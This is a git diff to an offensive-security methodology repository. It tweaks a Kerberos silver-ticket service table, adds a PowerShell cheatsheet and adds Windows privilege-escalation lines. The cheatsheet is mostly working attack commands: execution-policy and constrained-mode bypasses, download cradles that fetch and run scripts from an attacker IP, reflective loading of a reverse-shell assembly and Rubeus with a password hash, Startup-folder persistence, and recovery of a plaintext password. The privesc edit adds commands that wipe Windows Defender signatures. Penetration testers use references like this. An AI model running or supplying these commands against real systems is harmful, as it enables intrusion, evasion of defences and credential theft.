diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 24a322f..8834da2 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1448,7 +1448,7 @@ Interesting services to target with a silver ticket : | Service Type | Service Silver Tickets | Attack | |---------------------------------------------|------------------------|--------| | WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` | -| PowerShell Remoting | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| PowerShell Remoting | CIFS + HTTP + (wsman?) | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | | WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | | Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` | | Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` | diff --git a/Methodology and Resources/Powershell - Cheatsheet.md b/Methodology and Resources/Powershell - Cheatsheet.md new file mode 100644 index 0000000..9d64f1f --- /dev/null +++ b/Methodology and Resources/Powershell - Cheatsheet.md @@ -0,0 +1,110 @@ +# Powershell + +## Summary + +* Execution Policy +* Encoded Commands +* Download file +* Load Powershell scripts +* Load C# assembly reflectively +* Secure String to Plaintext +* References + +## Execution Policy + +```ps1 +powershell -EncodedCommand $encodedCommand +powershell -ep bypass ./PowerView.ps1 + +# Change execution policy +Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted +Set-ExecutionPolicy Bypass -Scope Process +``` + +## Constrained Mode + +```ps1 +# Check if we are in a constrained mode +# Values could be: FullLanguage or ConstrainedLanguage +$ExecutionContext.SessionState.LanguageMode + +## Bypass +powershell -version 2 +``` + +## Encoded Commands + +* Windows + ```ps1 + $command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' + $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) + $encodedCommand = [Convert]::ToBase64String($bytes) + ``` +* Linux: :warning: UTF-16LE encoding is required + ```ps1 + echo 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' | iconv -t utf-16le | base64 -w 0 + ``` + +## Download file + +```ps1 +# Any version +(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerView.ps1", "C:\Windows\Temp\PowerView.ps1") +wget "http://10.10.10.10/taskkill.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" +Import-Module BitsTransfer; Start-BitsTransfer -Source $url -Destination $output + +# Powershell 4+ +IWR "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" +Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" +``` + +## Load Powershell scripts + +```ps1 +# Proxy-aware +IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') +echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') | powershell -noprofile - +powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.10.10/PowerView.ps1')|iex" + +# Non-proxy aware +$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.10.10/PowerView.ps1',$false);$h.send();iex $h.responseText +``` + +## Load C# assembly reflectively + +```powershell +# Download and run assembly without arguments +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe') +$assem = [System.Reflection.Assembly]::Load($data) +[rev.Program]::Main() + +# Download and run Rubeus, with arguments (make sure to split the args) +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe') +$assem = [System.Reflection.Assembly]::Load($data) +[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) + +# Execute a specific method from an assembly (e.g. a DLL) +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll') +$assem = [System.Reflection.Assembly]::Load($data) +$class = $assem.GetType("ClassLibrary1.Class1") +$method = $class.GetMethod("runner") +$method.Invoke(0, $null) +``` + +## Secure String to Plaintext + +```ps1 +$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring +$user = "HTB\Tom" +$cred = New-Object System.management.Automation.PSCredential($user, $pass) +$cred.GetNetworkCredential() | fl +UserName : Tom +Password : 1ts-mag1c!!! +SecurePassword : System.Security.SecureString +Domain : HTB +``` + +## References + +* [Windows & Active Directory Exploitation Cheat Sheet and Command Reference - @chvancooten](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) +* [Basic PowerShell for Pentesters - HackTricks](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 52057a2..c67f48e 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -274,7 +274,8 @@ PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks" PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" # remove signatures (if Internet connection is present, they will be downloaded again): -PS > "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All +PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All +PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` ### Firewall